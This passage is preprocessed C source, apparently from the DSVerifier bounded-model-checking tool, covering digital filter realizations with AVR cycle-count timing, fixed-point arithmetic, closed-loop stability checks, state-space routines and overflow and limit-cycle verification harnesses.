(j < Nb - 1) { w[j] += *b_ptr++ * x; timer1 += 38; } timer1 += 54; } timer1 += 7; # 291 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/realizations.h" 3 4 ((void) sizeof (( # 291 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/realizations.h" (double) timer1 * hw.cycle <= ds.sample_time # 291 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/realizations.h" 3 4 ) ? 1 : 0), __extension__ ({ if ( # 291 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/realizations.h" (double) timer1 * hw.cycle <= ds.sample_time # 291 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/realizations.h" 3 4 ) ; else __assert_fail ( # 291 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/realizations.h" "(double) timer1 * hw.cycle <= ds.sample_time" # 291 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/realizations.h" 3 4 , "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/realizations.h", 291, __extension__ __PRETTY_FUNCTION__); })) # 291 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/realizations.h" ; return yout; } double generic_timing_double_direct_form_1(double y[], double x[], double a[], double b[], int Na, int Nb){ generic_timer += ((6 * hw.assembly.push) + (3 * hw.assembly.in) + (1 * hw.assembly.sbiw) + (1 * hw.assembly.cli) + (3 * hw.assembly.out) + (12 * hw.assembly.std)); double *a_ptr, *y_ptr, *b_ptr, *x_ptr; double sum = 0; a_ptr = &a[1]; y_ptr = &y[Na-1]; b_ptr = &b[0]; x_ptr = &x[Nb-1]; generic_timer += ((12 * hw.assembly.std) + (12 * hw.assembly.ldd) + (2 * hw.assembly.subi) + (2 * hw.assembly.sbci) + (4 * hw.assembly.lsl) + (4 * hw.assembly.rol) + (2 * hw.assembly.add) + (2 * hw.assembly.adc) + (1 * hw.assembly.adiw)); int i, j; generic_timer += ((2 * hw.assembly.std) + (1 * hw.assembly.rjmp)); for (i = 0; i < Nb; i++){ generic_timer += ((20 * hw.assembly.ldd) + (24 * hw.assembly.mov) + (2 * hw.assembly.subi) + (1 * hw.assembly.sbci) + (1 * hw.assembly.sbc) + (10 * hw.assembly.std) + (2 * hw.assembly.ld) + (2 * hw.assembly.rcall) + (1 * hw.assembly.adiw) + (1 * hw.assembly.cp) + (1 * hw.assembly.cpc) + (1 * hw.assembly.adiw) + (1 * hw.assembly.brge) + (1 * hw.assembly.rjmp)); sum += *b_ptr++ * *x_ptr--; } generic_timer += ((2 * hw.assembly.ldi) + (2 * hw.assembly.std) + (1 * hw.assembly.rjmp)); for (j = 1; j < Na; j++){ generic_timer += ((22 * hw.assembly.ldd) + (24 * hw.assembly.mov) + (2 * hw.assembly.subi) + (8 * hw.assembly.std) + (1 * hw.assembly.sbci) + (2 * hw.assembly.ld) + (2 * hw.assembly.rcall) + (1 * hw.assembly.sbc) + (1 * hw.assembly.adiw) + (1 * hw.assembly.cp) + (1 * hw.assembly.cpc) + (1 * hw.assembly.adiw) + (1 * hw.assembly.brge) + (1 * hw.assembly.rjmp)); sum -= *a_ptr++ * *y_ptr--; } generic_timer += ((4 * hw.assembly.ldd) + (4 * hw.assembly.mov) + (1 * hw.assembly.adiw) + (1 * hw.assembly.in) + (1 * hw.assembly.cli) + (3 * hw.assembly.out) + (6 * hw.assembly.pop) + (1 * hw.assembly.ret)); return sum; } double generic_timing_double_direct_form_2(double w[], double x, double a[], double b[], int Na, int Nb) { generic_timer += ((8 * hw.assembly.push) + (14 * hw.assembly.std) + (3 * hw.assembly.out) + (3 * hw.assembly.in) + (1 * hw.assembly.sbiw) + (1 * hw.assembly.cli)); double *a_ptr, *b_ptr, *w_ptr; double sum = 0; a_ptr = &a[1]; b_ptr = &b[0]; w_ptr = &w[1]; int k, j; generic_timer += ((10 * hw.assembly.std) + (6 * hw.assembly.ldd) + (2 * hw.assembly.adiw)); generic_timer += ((2 * hw.assembly.ldi) + (2 * hw.assembly.std) + (1 * hw.assembly.rjmp)); for (j = 1; j < Na; j++) { w[0] -= *a_ptr++ * *w_ptr++; generic_timer += ((23 * hw.assembly.ldd) + (32 * hw.assembly.mov) + (9 * hw.assembly.std) + (2 * hw.assembly.subi) + (3 * hw.assembly.ld) + (2 * hw.assembly.rcall) + (2 * hw.assembly.sbci) + (1 * hw.assembly.st) + (1 * hw.assembly.adiw) + (1 * hw.assembly.cp) + (1 * hw.assembly.cpc) + (1 * hw.assembly.brge)); } w[0] += x; w_ptr = &w[0]; generic_timer += ((13 * hw.assembly.ldd) + (12 * hw.assembly.mov) + (5 * hw.assembly.std) + (1 * hw.assembly.st) + (1 * hw.assembly.ld) + (1 * hw.assembly.rcall)); generic_timer += ((2 * hw.assembly.std) + (1 * hw.assembly.rjmp)); for (k = 0; k < Nb; k++) { sum += *b_ptr++ * *w_ptr++; generic_timer += ((20 * hw.assembly.ldd) + (24 * hw.assembly.mov) + (10 * hw.assembly.std) + (2 * hw.assembly.rcall) + (2 * hw.assembly.ld) + (2 * hw.assembly.subi) + (2 * hw.assembly.sbci) + (1 * hw.assembly.adiw) + (1 * hw.assembly.cp) + (1 * hw.assembly.cpc) + (1 * hw.assembly.brge) + (1 * hw.assembly.rjmp)); } generic_timer += ((4 * hw.assembly.ldd) + (4 * hw.assembly.mov) + (1 * hw.assembly.adiw) + (1 * hw.assembly.in) + (1 * hw.assembly.cli) + (3 * hw.assembly.out) + (8 * hw.assembly.pop) + (1 * hw.assembly.ret)); return sum; } double generic_timing_double_transposed_direct_form_2(double w[], double x, double a[], double b[], int Na, int Nb) { generic_timer += ((8 * hw.assembly.push) + (14 * hw.assembly.std) + (3 * hw.assembly.out) + (3 * hw.assembly.in) + (1 * hw.assembly.sbiw) + (1 * hw.assembly.cli)); double *a_ptr, *b_ptr; double yout = 0; a_ptr = &a[1]; b_ptr = &b[0]; int Nw = Na > Nb ? Na : Nb; yout = (*b_ptr++ * x) + w[0]; int j; generic_timer += ((15 * hw.assembly.std) + (22 * hw.assembly.ldd) + (24 * hw.assembly.mov) + (2 * hw.assembly.rcall) + (2 * hw.assembly.ld) + (1 * hw.assembly.cp) + (1 * hw.assembly.cpc) + (1 * hw.assembly.subi) + (1 * hw.assembly.sbci) + (1 * hw.assembly.brge) + (1 * hw.assembly.adiw)); generic_timer += ((2 * hw.assembly.std) + (1 * hw.assembly.rjmp)); for (j = 0; j < Nw - 1; j++) { w[j] = w[j + 1]; if (j < Na - 1) { w[j] -= *a_ptr++ * yout; } if (j < Nb - 1) { w[j] += *b_ptr++ * x; } generic_timer += ((70 * hw.assembly.mov) + (65 * hw.assembly.ldd) + (12 * hw.assembly.lsl) + (12 * hw.assembly.rol) + (15 * hw.assembly.std) + (6 * hw.assembly.add) + (6 * hw.assembly.adc) + (2 * hw.assembly.adiw) + (3 * hw.assembly.cpc) + (3 * hw.assembly.cp) + (5 * hw.assembly.ld) + (4 * hw.assembly.rcall) + (5 * hw.assembly.subi) + (3 * hw.assembly.rjmp) + (2 * hw.assembly.brlt) + (3 * hw.assembly.st) + (2 * hw.assembly.sbci) + (3 * hw.assembly.sbc) + (1 * hw.assembly.brge)); } generic_timer += ((4 * hw.assembly.ldd) + (4 * hw.assembly.mov) + (8 * hw.assembly.pop) + (3 * hw.assembly.out) + (1 * hw.assembly.in) + (1 * hw.assembly.cli) + (1 * hw.assembly.adiw) + (1 * hw.assembly.ret)); return yout; } void double_direct_form_1_impl2(double x[], int x_size, double b[], int b_size, double a[], int a_size, double y[]){ int i = 0; int j = 0; double v[x_size]; for(i = 0; i < x_size; i++){ v[i] = 0; for(j = 0; j < b_size; j++){ if (j > i) break; v[i] = v[i] + x[i-j] * b[j]; } } y[0] = v[0]; for(i = 1; i < x_size; i++){ y[i] = 0; y[i] = y[i] + v[i]; for(j = 1; j < a_size; j++){ if (j > i) break; y[i] = y[i] + y[i-j] * ((-1) * a[j]); } } } void fxp_direct_form_1_impl2(fxp_t x[], int x_size, fxp_t b[], int b_size, fxp_t a[], int a_size, fxp_t y[]){ int i = 0; int j = 0; fxp_t v[x_size]; for(i = 0; i < x_size; i++){ v[i] = 0; for(j = 0; j < b_size; j++){ if (j > i) break; v[i] = fxp_add(v[i], fxp_mult(x[i-j], b[j])); } } y[0] = v[0]; for(i = 1; i < x_size; i++){ y[i] = 0; y[i] = fxp_add(y[i], v[i]); for(j = 1; j < a_size; j++){ if (j > i) break; y[i] = fxp_add(y[i], fxp_mult(y[i-j] , -a[j])); } } } # 26 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/dsverifier.h" 2 # 1 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/delta-operator.h" 1 # 19 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/delta-operator.h" # 1 "/usr/include/assert.h" 1 3 4 # 20 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/delta-operator.h" 2 # 1 "/usr/include/assert.h" 1 3 4 # 23 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/delta-operator.h" 2 int nchoosek(int n, int k){ if (k == 0) return 1; return (n * nchoosek(n - 1, k - 1)) / k; } void generate_delta_coefficients(double vetor[], double out[], int n, double delta){ int i,j; int N = n - 1; double sum_delta_operator; for(i=0; i<=N; i++) { sum_delta_operator = 0; for(j=0; j<=i; j++) { sum_delta_operator = sum_delta_operator + vetor[j]*nchoosek(N-j,i-j); } out[i] = internal_pow(delta,N-i)*sum_delta_operator; } } void get_delta_transfer_function(double b[], double b_out[], int b_size, double a[], double a_out[], int a_size, double delta){ generate_delta_coefficients(b, b_out, b_size, delta); generate_delta_coefficients(a, a_out, a_size, delta); } void get_delta_transfer_function_with_base(double b[], double b_out[], int b_size, double a[], double a_out[], int a_size, double delta){ int i,j; int N = a_size - 1; int M = b_size - 1; double sum_delta_operator; for(i=0; i<=N; i++) { sum_delta_operator = 0; for(j=0; j<=i; j++) { sum_delta_operator = sum_delta_operator + a[j]*nchoosek(N-j,i-j); } a_out[i] = internal_pow(delta,N-i)*sum_delta_operator; } for(i=0; i<=M; i++) { sum_delta_operator = 0; for(j=0; j<=i; j++) { sum_delta_operator = sum_delta_operator + b[j]*nchoosek(M-j,i-j); } b_out[i] = internal_pow(delta,M-i)*sum_delta_operator; } } # 27 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/dsverifier.h" 2 # 1 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/closed-loop.h" 1 # 28 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/closed-loop.h" void ft_closedloop_series(double c_num[], int Nc_num, double c_den[], int Nc_den, double model_num[], int Nmodel_num, double model_den[], int Nmodel_den, double ans_num[], int Nans_num, double ans_den[], int Nans_den){ Nans_num = Nc_num + Nmodel_num - 1; Nans_den = Nc_den + Nmodel_den - 1 ; double den_mult [Nans_den]; poly_mult(c_num, Nc_num, model_num, Nmodel_num, ans_num, Nans_num); poly_mult(c_den, Nc_den, model_den, Nmodel_den, den_mult, Nans_den ); poly_sum(ans_num, Nans_num , den_mult, Nans_den , ans_den, Nans_den); } void ft_closedloop_sensitivity(double c_num[], int Nc_num, double c_den[], int Nc_den, double model_num[], int Nmodel_num, double model_den[], int Nmodel_den, double ans_num[], int Nans_num, double ans_den[], int Nans_den){ int Nans_num_p = Nc_num + Nmodel_num-1; Nans_den = Nc_den + Nmodel_den-1; Nans_num = Nc_den + Nmodel_den-1; double num_mult [Nans_num_p]; poly_mult(c_den, Nc_den, model_den, Nmodel_den, ans_num, Nans_num); poly_mult(c_num, Nc_num, model_num, Nmodel_num, num_mult, Nans_num_p); poly_sum(ans_num, Nans_num, num_mult, Nans_num_p, ans_den, Nans_den); } void ft_closedloop_feedback(double c_num[], int Nc_num, double c_den[], int Nc_den, double model_num[], int Nmodel_num, double model_den[], int Nmodel_den, double ans_num[], int Nans_num, double ans_den[], int Nans_den){ Nans_num = Nc_den + Nmodel_num - 1; Nans_den = Nc_den + Nmodel_den - 1; int Nnum_mult = Nc_num + Nmodel_num - 1; double den_mult [Nans_den]; double num_mult [Nnum_mult]; poly_mult(c_num, Nc_num, model_num, Nmodel_num, num_mult, Nnum_mult); poly_mult(c_den, Nc_den, model_den, Nmodel_den, den_mult, Nans_den); poly_sum(num_mult, Nnum_mult, den_mult, Nans_den, ans_den, Nans_den); poly_mult(c_den, Nc_den, model_num, Nmodel_num, ans_num, Nans_num); } int check_stability_closedloop(double a[], int n, double plant_num[], int p_num_size, double plant_den[], int p_den_size){ int columns = n; double m[2 * n - 1][n]; int i,j; int first_is_positive = 0; double * p_num = plant_num; double * p_den = plant_den; double sum = 0; for (i=0; i < n; i++){ sum += a[i]; } __DSVERIFIER_assert(sum > 0); sum = 0; for (i=0; i < n; i++){ sum += a[i] * internal_pow(-1, n-1-i); } sum = sum * internal_pow(-1, n-1); __DSVERIFIER_assert(sum > 0); __DSVERIFIER_assert(internal_abs(a[n-1]) < a[0]); for (i=0; i < 2 * n - 1; i++){ for (j=0; j < columns; j++){ m[i][j] = 0; if (i == 0){ m[i][j] = a[j]; continue; } if (i % 2 != 0 ){ int x; for(x=0; x<columns;x++){ m[i][x] = m[i-1][columns-x-1]; } columns = columns - 1; j = columns; }else{ __DSVERIFIER_assert(m[i-2][0] > 0); m[i][j] = m[i-2][j] - (m[i-2][columns] / m[i-2][0]) * m[i-1][j]; __DSVERIFIER_assert((m[0][0] >= 0) && (m[i][0] >= 0)); } } } return 1; } # 28 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/dsverifier.h" 2 # 1 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/initialization.h" 1 # 17 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/initialization.h" extern digital_system ds; extern digital_system plant; extern digital_system control; extern implementation impl; extern filter_parameters filter; extern hardware hw; void initialization(){ if (impl.frac_bits >= 32){ printf("impl.frac_bits must be less than word width!\n"); } if (impl.int_bits >= 32 - impl.frac_bits){ printf("impl.int_bits must be less than word width subtracted by precision!\n"); # 33 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/initialization.h" 3 4 ((void) sizeof (( # 33 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/initialization.h" 0 # 33 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/initialization.h" 3 4 ) ? 1 : 0), __extension__ ({ if ( # 33 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/initialization.h" 0 # 33 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/initialization.h" 3 4 ) ; else __assert_fail ( # 33 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/initialization.h" "0" # 33 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/initialization.h" 3 4 , "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/initialization.h", 33, __extension__ __PRETTY_FUNCTION__); })) # 33 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/initialization.h" ; } if(impl.frac_bits >= 31){ _fxp_one = 0x7fffffff; }else{ _fxp_one = (0x00000001 << impl.frac_bits); } _fxp_half = (0x00000001 << (impl.frac_bits - 1)); _fxp_minus_one = -(0x00000001 << impl.frac_bits); _fxp_min = -(0x00000001 << (impl.frac_bits + impl.int_bits - 1)); _fxp_max = (0x00000001 << (impl.frac_bits + impl.int_bits - 1)) - 1; _fxp_fmask = ((((int32_t) 1) << impl.frac_bits) - 1); _fxp_imask = ((0x80000000) >> (32 - impl.frac_bits - 1)); _dbl_min = _fxp_min; _dbl_min /= (1 << impl.frac_bits); _dbl_max = _fxp_max; _dbl_max /= (1 << impl.frac_bits); if ((impl.scale == 0) || (impl.scale == 1)){ impl.scale = 1; return; } if (impl.min != 0){ impl.min = impl.min / impl.scale; } if (impl.max != 0){ impl.max = impl.max / impl.scale; } # 80 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/initialization.h" } # 29 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/dsverifier.h" 2 # 1 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/state-space.h" 1 # 19 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/state-space.h" extern digital_system_state_space _controller; extern int nStates; extern int nInputs; extern int nOutputs; double double_state_space_representation(void){ double result1[4][4]; double result2[4][4]; int i, j; for(i=0; i<4;i++){ for(j=0; j<4;j++){ result1[i][j]=0; result2[i][j]=0; } } double_matrix_multiplication(nOutputs,nStates,nStates,1,_controller.C,_controller.states,result1); double_matrix_multiplication(nOutputs,nInputs,nInputs,1,_controller.D,_controller.inputs,result2); double_add_matrix(nOutputs, 1, result1, result2, _controller.outputs); double_matrix_multiplication(nStates,nStates,nStates,1,_controller.A,_controller.states,result1); double_matrix_multiplication(nStates,nInputs,nInputs,1,_controller.B,_controller.inputs,result2); double_add_matrix(nStates, 1, result1, result2, _controller.states); return _controller.outputs[0][0]; } double fxp_state_space_representation(void){ fxp_t result1[4][4]; fxp_t result2[4][4]; int i, j; for(i=0; i<4;i++){ for(j=0; j<4;j++){ result1[i][j]=0; result2[i][j]=0; } } fxp_t A_fpx[4][4]; fxp_t B_fpx[4][4]; fxp_t C_fpx[4][4]; fxp_t D_fpx[4][4]; fxp_t states_fpx[4][4]; fxp_t inputs_fpx[4][4]; fxp_t outputs_fpx[4][4]; for(i=0; i<4;i++){ for(j=0; j<4;j++){ A_fpx[i][j]=0; } } for(i=0; i<4;i++){ for(j=0; j<4;j++){ B_fpx[i][j]=0; } } for(i=0; i<4;i++){ for(j=0; j<4;j++){ C_fpx[i][j]=0; } } for(i=0; i<4;i++){ for(j=0; j<4;j++){ D_fpx[i][j]=0; } } for(i=0; i<4;i++){ for(j=0; j<4;j++){ states_fpx[i][j]=0; } } for(i=0; i<4;i++){ for(j=0; j<4;j++){ inputs_fpx[i][j]=0; } } for(i=0; i<4;i++){ for(j=0; j<4;j++){ outputs_fpx[i][j]=0; } } for(i=0; i<nStates;i++){ for(j=0; j<nStates;j++){ A_fpx[i][j]= fxp_double_to_fxp(_controller.A[i][j]); } } for(i=0; i<nStates;i++){ for(j=0; j<nInputs;j++){ B_fpx[i][j]= fxp_double_to_fxp(_controller.B[i][j]); } } for(i=0; i<nOutputs;i++){ for(j=0; j<nStates;j++){ C_fpx[i][j]= fxp_double_to_fxp(_controller.C[i][j]); } } for(i=0; i<nOutputs;i++){ for(j=0; j<nInputs;j++){ D_fpx[i][j]= fxp_double_to_fxp(_controller.D[i][j]); } } for(i=0; i<nStates;i++){ for(j=0; j<1;j++){ states_fpx[i][j]= fxp_double_to_fxp(_controller.states[i][j]); } } for(i=0; i<nInputs;i++){ for(j=0; j<1;j++){ inputs_fpx[i][j]= fxp_double_to_fxp(_controller.inputs[i][j]); } } for(i=0; i<nOutputs;i++){ for(j=0; j<1;j++){ outputs_fpx[i][j]= fxp_double_to_fxp(_controller.outputs[i][j]); } } fxp_matrix_multiplication(nOutputs,nStates,nStates,1,C_fpx,states_fpx,result1); fxp_matrix_multiplication(nOutputs,nInputs,nInputs,1,D_fpx,inputs_fpx,result2); fxp_add_matrix(nOutputs, 1, result1, result2, outputs_fpx); fxp_matrix_multiplication(nStates,nStates,nStates,1,A_fpx,states_fpx,result1); fxp_matrix_multiplication(nStates,nInputs,nInputs,1,B_fpx,inputs_fpx,result2); fxp_add_matrix(nStates, 1, result1, result2, states_fpx); for(i=0; i<nStates;i++){ for(j=0; j<1;j++){ _controller.states[i][j]= fxp_to_double(states_fpx[i][j]); } } for(i=0; i<nOutputs;i++){ for(j=0; j<1;j++){ _controller.outputs[i][j]= fxp_to_double(outputs_fpx[i][j]); } } return _controller.outputs[0][0]; } # 30 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/dsverifier.h" 2 # 1 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/filter_functions.h" 1 # 20 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/filter_functions.h" double sinTyl(double x, int precision){ double sine; double xsquared = x*x; double aux; if (precision < 0) { printf("Warning: Function sinTyl from bmc/core/filter_functions.h: " "Precision must be a positive integer. Assuming 0 precision\n"); precision = 0; } if (precision >= 0) { aux = 0; sine = aux; if (precision >= 1) { aux = x; sine += aux; if (precision >= 2) { aux = aux*xsquared; sine -= aux/6; if (precision >= 3) { aux = aux*xsquared; sine +=aux/120; if(precision >=4) { aux = aux*xsquared; sine -=aux/5040; if(precision >= 5) { aux = aux*xsquared; sine +=aux/362880; if(precision >= 6) { aux = aux*xsquared; sine -=aux/39916800; if (precision >= 7) printf("Warning: Function sinTyl " "from bmc/core/filter_functions.h: Precision " "representation exceeded. Assuming maximum precision of 6\n"); } } } } } } } return sine; } double cosTyl(double x, int precision){ double cosine; double xsquared = x*x; double aux; if (precision < 0) { printf("Warning: Function cosTyl from bmc/core/filter_functions.h: " "Precision must be a positive integer. Assuming 0 precision\n"); precision = 0; } if (precision >= 0) { aux = 0; cosine = aux; if (precision >= 1) { aux = 1; cosine = 1; if (precision >= 2) { aux = xsquared; cosine -= aux/2; if (precision >= 3) { aux = aux*xsquared; cosine += aux/24; if(precision >=4) { aux = aux*xsquared; cosine -=aux/720; if(precision >= 5) { aux = aux*xsquared; cosine +=aux/40320; if(precision >= 6) { aux = aux*xsquared; cosine -=aux/3628800; if (precision >= 7) printf("Warning: Function sinTyl " "from bmc/core/filter_functions.h: Precision " "representation exceeded. Assuming maximum precision of 6\n"); } } } } } } } return cosine; } double atanTyl(double x, int precision){ double atangent; double xsquared = x*x; double aux; if (precision < 0) { printf("Warning: Function sinTyl from bmc/core/filter_functions.h: " "Precision must be a positive integer. Assuming 0 precision\n"); precision = 0; } if (precision >= 0) { aux = 0; atangent = aux; if (precision >= 1) { aux = x; atangent = aux; if (precision >= 2) { aux = xsquared; atangent -= aux/3; if (precision >= 3) { aux = aux*xsquared; atangent += aux/5; if(precision >=4) { aux = aux*xsquared; atangent -=aux/7; if (precision >= 7) printf("Warning: Function sinTyl from bmc/core/filter_functions.h: " "Precision representation exceeded. Assuming maximum precision of 4\n"); } } } } } return atangent; } float sqrt1(const float x) { const float xhalf = 0.5f*x; union { float x; int i; } u; u.x = x; u.i = 0x5f3759df - (u.i >> 1); return x*u.x*(1.5f - xhalf*u.x*u.x); } float sqrt2(const float x) { union { int i; float x; } u; u.x = x; u.i = (1<<29) + (u.i >> 1) - (1<<22); return u.x; } float fabsolut(float x) { if (x < 0) x = -x; return x; } static float sqrt3(float val) { float x = val/10; float dx; double diff; double min_tol = 0.00001; int i, flag; flag = 0; if (val == 0 ) x = 0; else { for (i=1;i<20;i++) { if (!flag) { dx = (val - (x*x)) / (2.0 * x); x = x + dx; diff = val - (x*x); if (fabsolut(diff) <= min_tol) flag = 1; } else x =x; } } return (x); } # 31 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/dsverifier.h" 2 # 1 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_overflow.h" 1 # 19 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_overflow.h" int nondet_int(); float nondet_float(); extern digital_system ds; extern implementation impl; int verify_overflow(void) { fxp_t a_fxp[ds.a_size]; fxp_t b_fxp[ds.b_size]; fxp_double_to_fxp_array(ds.a, a_fxp, ds.a_size); fxp_double_to_fxp_array(ds.b, b_fxp, ds.b_size); # 73 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_overflow.h" fxp_t min_fxp = fxp_double_to_fxp(impl.min); fxp_t max_fxp = fxp_double_to_fxp(impl.max); fxp_t y[X_SIZE_VALUE]; fxp_t x[X_SIZE_VALUE]; int i; for (i = 0; i < X_SIZE_VALUE; ++i) { y[i] = 0; x[i] = nondet_int(); __DSVERIFIER_assume(x[i] >= min_fxp && x[i] <= max_fxp); } int Nw = 0; Nw = ds.a_size > ds.b_size ? ds.a_size : ds.b_size; fxp_t yaux[ds.a_size]; fxp_t xaux[ds.b_size]; fxp_t waux[Nw]; for (i = 0; i < ds.a_size; ++i) { yaux[i] = 0; } for (i = 0; i < ds.b_size; ++i) { xaux[i] = 0; } for (i = 0; i < Nw; ++i) { waux[i] = 0; } fxp_t xk, temp; fxp_t *aptr, *bptr, *xptr, *yptr, *wptr; int j; for (i = 0; i < X_SIZE_VALUE; ++i) { shiftL(x[i], xaux, ds.b_size); y[i] = fxp_direct_form_1(yaux, xaux, a_fxp, b_fxp, ds.a_size, ds.b_size); shiftL(y[i], yaux, ds.a_size); # 174 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_overflow.h" } overflow_mode = 1; fxp_verify_overflow_array(y, X_SIZE_VALUE); return 0; } # 33 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/dsverifier.h" 2 # 1 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_limit_cycle.h" 1 # 15 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_limit_cycle.h" extern digital_system ds; extern implementation impl; extern digital_system_state_space _controller; extern int nStates; extern int nInputs; extern int nOutputs; int verify_limit_cycle_state_space(void){ double stateMatrix[4][4]; double outputMatrix[4][4]; double arrayLimitCycle[4]; double result1[4][4]; double result2[4][4]; int i, j, k; for(i=0; i<4;i++){ for(j=0; j<4;j++){ result1[i][j]=0; result2[i][j]=0; stateMatrix[i][j]=0; outputMatrix[i][j]=0; } } double_matrix_multiplication(nOutputs,nStates,nStates,1,_controller.C,_controller.states,result1); double_matrix_multiplication(nOutputs,nInputs,nInputs,1,_controller.D,_controller.inputs,result2); double_add_matrix(nOutputs, 1, result1, result2, _controller.outputs); k = 0; for (i = 1; i < 0; i++) { double_matrix_multiplication(nStates,nStates,nStates,1,_controller.A,_controller.states,result1); double_matrix_multiplication(nStates,nInputs,nInputs,1,_controller.B,_controller.inputs,result2); double_add_matrix(nStates, 1, result1, result2, _controller.states); double_matrix_multiplication(nOutputs,nStates,nStates,1,_controller.C,_controller.states,result1); double_matrix_multiplication(nOutputs,nInputs,nInputs,1,_controller.D,_controller.inputs,result2); double_add_matrix(nOutputs, 1, result1, result2, _controller.outputs); int l; for(l = 0; l < nStates; l++){ stateMatrix[l][k] = _controller.states[l][0]; } for(l = 0; l < nOutputs; l++){ stateMatrix[l][k] = _controller.outputs[l][0]; } k++; } printf("#matrix STATES -------------------------------"); print_matrix(stateMatrix,nStates,0); printf("#matrix OUTPUTS -------------------------------"); print_matrix(outputMatrix,nOutputs,0); # 93 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_limit_cycle.h" 3 4 ((void) sizeof (( # 93 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_limit_cycle.h" 0 # 93 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_limit_cycle.h" 3 4 ) ? 1 : 0), __extension__ ({ if ( # 93 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_limit_cycle.h" 0 # 93 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_limit_cycle.h" 3 4 ) ; else __assert_fail ( # 93 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_limit_cycle.h" "0" # 93 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_limit_cycle.h" 3 4 , "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_limit_cycle.h", 93, __extension__ __PRETTY_FUNCTION__); })) # 93 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_limit_cycle.h" ; for(i=0; i<nStates;i++){ for(j=0; 